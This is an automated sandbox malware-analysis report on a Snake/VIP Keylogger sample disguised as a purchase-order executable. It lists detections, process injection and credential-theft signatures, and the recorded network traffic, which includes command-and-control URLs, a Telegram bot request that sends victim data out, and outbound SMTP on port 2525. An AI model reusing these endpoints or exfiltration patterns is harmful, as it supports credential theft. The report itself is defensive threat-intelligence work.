Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
new order 00041221.exe

Overview

General Information

Sample name:new order 00041221.exe
Analysis ID:1482843
MD5:f0c82f395d37fa87114ca7ef075695c8
SHA1:06df165721ef1544251108d1af927786ea7de870
SHA256:d954045a10b2292df4e754ad6f1c5350c82ce0a75d2cd9275ada797eca2c413f
Tags:exePayment
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • new order 00041221.exe (PID: 1000 cmdline: "C:\Users\user\Desktop\new order 00041221.exe" MD5: F0C82F395D37FA87114CA7EF075695C8)
    • new order 00041221.exe (PID: 5292 cmdline: "C:\Users\user\Desktop\new order 00041221.exe" MD5: F0C82F395D37FA87114CA7EF075695C8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.3711414422.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x2d526:$a1: get_encryptedPassword
          • 0x2d843:$a2: get_encryptedUsername
          • 0x2d336:$a3: get_timePasswordChanged
          • 0x2d43f:$a4: get_passwordField
          • 0x2d53c:$a5: set_encryptedPassword
          • 0x2ec15:$a7: get_logins
          • 0x2eb78:$a10: KeyLoggerEventArgs
          • 0x2e7dd:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 17 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          1.2.new order 00041221.exe.3859970.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            1.2.new order 00041221.exe.3859970.3.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              1.2.new order 00041221.exe.3859970.3.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                1.2.new order 00041221.exe.3859970.3.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  1.2.new order 00041221.exe.3859970.3.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    Click to see the 28 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Suspicious Outbound SMTP Connections
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 203.124.44.4, DestinationIsIpv6: false, DestinationPort: 2525, EventID: 3, Image: C:\Users\user\Desktop\new order 00041221.exe, Initiated: true, ProcessId: 5292, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49727

                    Snort Signatures

                    No Snort rule has matched

                    Suricata Signatures

                    Timestamp:2024-07-26T09:03:24.118819+0200
                    SID:2803305
                    Source Port:49720
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-07-26T09:03:09.919075+0200
                    SID:2803305
                    Source Port:49706
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-07-26T09:03:45.702091+0200
                    SID:2022930
                    Source Port:443
                    Destination Port:55797
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T09:03:10.643717+0200
                    SID:2803274
                    Source Port:49707
                    Destination Port:80
                    Protocol:TCP
                    Classtype:Potentially Bad Traffic
                    Timestamp:2024-07-26T09:03:09.300053+0200
                    SID:2803274
                    Source Port:49702
                    Destination Port:80
                    Protocol:TCP
                    Classtype:Potentially Bad Traffic
                    Timestamp:2024-07-26T09:03:24.465395+0200
                    SID:2022930
                    Source Port:443
                    Destination Port:49717
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T09:03:06.940575+0200
                    SID:2803274
                    Source Port:49702
                    Destination Port:80
                    Protocol:TCP
                    Classtype:Potentially Bad Traffic
                    Timestamp:2024-07-26T09:03:44.316920+0200
                    SID:2022930
                    Source Port:443
                    Destination Port:55796
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for URL or domain
                    Source: http://anotherarmy.dns.army:8081Avira URL Cloud: Label: malware
                    Multi AV Scanner detection for domain / URL
                    Source: http://aborters.duckdns.org:8081Virustotal: Detection: 11%Perma Link
                    Source: http://varders.kozow.com:8081Virustotal: Detection: 14%Perma Link
                    Source: http://anotherarmy.dns.army:8081Virustotal: Detection: 14%Perma Link
                    Multi AV Scanner detection for submitted file
                    Source: new order 00041221.exeVirustotal: Detection: 41%Perma Link
                    Source: new order 00041221.exeReversingLabs: Detection: 47%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for sample
                    Source: new order 00041221.exeJoe Sandbox ML: detected

                    Location Tracking

                    barindex
                    Tries to detect the country of the analysis system (by using the IP)
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: new order 00041221.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49703 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49726 version: TLS 1.2
                    Source: new order 00041221.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 4x nop then jmp 0127F2EDh3_2_0127F150
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 4x nop then jmp 0127F2EDh3_2_0127F33C
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 4x nop then jmp 0127FAA9h3_2_0127F7F1
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 4x nop then jmp 05A331E8h3_2_05A32DC0
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 4x nop then jmp 05A3F471h3_2_05A3F1C8
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 4x nop then jmp 05A331E8h3_2_05A32DD0
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 4x nop then jmp 05A331E8h3_2_05A33116
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 4x nop then jmp 05A3EBC1h3_2_05A3E918
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 4x nop then jmp 05A32C21h3_2_05A32970
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 4x nop then jmp 05A3F019h3_2_05A3ED70
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 4x nop then jmp 05A3E769h3_2_05A3E4C0
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 4x nop then jmp 05A3DEB9h3_2_05A3DC10
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 4x nop then jmp 05A3E311h3_2_05A3E068
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_05A30040
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_05A30853
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 4x nop then jmp 05A3DA61h3_2_05A3D7B8
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 4x nop then jmp 05A30D0Dh3_2_05A30B30
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 4x nop then jmp 05A31697h3_2_05A30B30
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 4x nop then jmp 05A3D1B1h3_2_05A3CF08
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 4x nop then jmp 05A3D609h3_2_05A3D360
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 4x nop then jmp 05A3F8C9h3_2_05A3F620
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_05A30673
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 4x nop then jmp 05A3FD21h3_2_05A3FA78

                    Networking

                    barindex
                    Uses the Telegram API (likely for C&C communication)
                    Source: unknownDNS query: name: api.telegram.org
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.new order 00041221.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, type: UNPACKEDPE
                    Source: global trafficTCP traffic: 192.168.2.7:49727 -> 203.124.44.4:2525
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20and%20Time:%2027/07/2024%20/%2000:07:11%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20899552%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                    Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
                    Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: checkip.dyndns.org
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49703 version: TLS 1.0
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20and%20Time:%2027/07/2024%20/%2000:07:11%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20899552%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                    Source: global trafficDNS traffic detected: DNS query: mail.moonbrosurgical.com
                    Source: global trafficDNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 26 Jul 2024 07:03:27 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                    Source: new order 00041221.exe, 00000003.00000002.3711414422.00000000030D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                    Source: new order 00041221.exe, 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                    Source: new order 00041221.exe, 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                    Source: new order 00041221.exe, 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                    Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                    Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                    Source: new order 00041221.exe, 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                    Source: new order 00041221.exe, 00000003.00000002.3711414422.00000000030E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.moonbrosurgical.com
                    Source: new order 00041221.exe, 00000003.00000002.3711414422.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3710772677.0000000001337000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.i.lencr.org/0Q
                    Source: new order 00041221.exe, 00000003.00000002.3711414422.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3710772677.0000000001337000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.o.lencr.org0#
                    Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: new order 00041221.exe, 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                    Source: new order 00041221.exe, 00000003.00000002.3711414422.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3716273829.0000000006678000.00000004.00000020.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3710772677.0000000001337000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                    Source: new order 00041221.exe, 00000003.00000002.3711414422.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3716273829.0000000006678000.00000004.00000020.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3710772677.0000000001337000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000002FC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                    Source: new order 00041221.exe, 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002FC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                    Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000002FC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                    Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000002FC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20a
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000003074000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000003065000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.00000000030A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                    Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000003065000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en0
                    Source: new order 00041221.exe, 00000003.00000002.3711414422.000000000306F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000002F2F000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002F9F000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002FC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                    Source: new order 00041221.exe, 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002F2F000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000002F5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
